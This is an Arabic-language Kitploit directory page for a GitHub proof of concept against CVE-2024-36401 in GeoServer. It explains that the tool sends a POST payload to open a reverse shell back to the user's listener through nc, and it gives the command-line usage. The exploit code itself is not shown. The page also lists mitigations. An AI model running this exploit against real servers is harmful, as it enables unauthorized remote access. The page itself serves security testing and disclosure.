Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-36401 — POC لـ CVE-2024-36401. سيحاول هذا الـ POC إنشاء reverse shell من الأهداف الضعيفة. | Kitploit
أدوات/GitHubGitHub/bigb0x/cve-2024-36401
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubbigb0x/cve-2024-36401

CVE-2024-36401

POC لـ CVE-2024-36401. سيحاول هذا الـ POC إنشاء reverse shell من الأهداف الضعيفة.

عرض المستودع
3415منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RCE لـ CVE-2024-36401

POC لـ CVE-2024-36401 GeoServer. سيحاول هذا الـ POC إنشاء قشرة عكسية للنظام من الأهداف.

Banner

نظرة عامة

POC لـ CVE-2024-36401: RCE لإصدارات GeoServer الأقدم من 2.25.1 و2.24.3 و2.23.5. يعتمد هذا الـ POC على النشرة الأمنية من phith0n.

كيف يعمل

  1. يقوم بإعداد مستمع على جهازك لاستقبال القشرة العكسية الواردة من الهدف.
  2. يرسل هذا الـ POC طلب POST مع الحمولات.
  3. يحاول إنشاء قشرة على الخادم الهدف.
  4. تفترض هذه التقنية أن nc مثبت على الهدف.

طريقة الاستخدام

سيحاول هذا الـ POC إنشاء قشرة عكسية من الأهداف الضعيفة. وهو مصمم للعمل ضد أهداف Linux الضعيفة. يجب أن يكون لديك جهاز بعنوان IP منشور ويمكن الوصول إليه لتشغيل هذا الـ POC.

المتطلبات الدنيا

  • Python 3.6 أو أحدث
  • مكتبة requests

لاستخدام هذا الـ POC ضد هدف واحد:

root@kitploit:~
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type

المساعدة:

root@kitploit:~
python3 CVE-2024-36401.py  -h

options:
  -h, --help  show this help message and exit
  -u U        Target, example https://target:8080
  -ip IP      Your IP, example 192.168.1.1
  -port PORT  Port, example 1337
  -type TYPE  Type, example sf:archsites

كيفية حماية جهاز GeoServer الخاص بك

1- قم بتعطيل طلبات WFS.

2- قم بتأمين نظام Linux الخاص بك عن طريق تكوين iptables لتعطيل الاتصالات العكسية، وضبط السياسات الافتراضية لإسقاط كل الحركة، والسماح بالاتصالات القائمة وذات الصلة، والسماح فقط بحركة المرور الصادرة الأساسية مثل DNS وHTTP وHTTPS.

3- أو قم بالترقية إلى أحدث إصدار من GeoServer.

التواصل

لأي اقتراحات أو أفكار، يرجى التواصل معي عبر هذا الرابط.

إخلاء المسؤولية

أحب إنشاء أدواتي الخاصة للمتعة والعمل ولأغراض تعليمية فقط. لا أدعم أو أشجع القرصنة أو الوصول غير المصرح به إلى أي نظام أو شبكة. يرجى استخدام أدواتي بمسؤولية وفقط على الأنظمة التي لديك إذن واضح لاختبارها.

تنزيل الأداة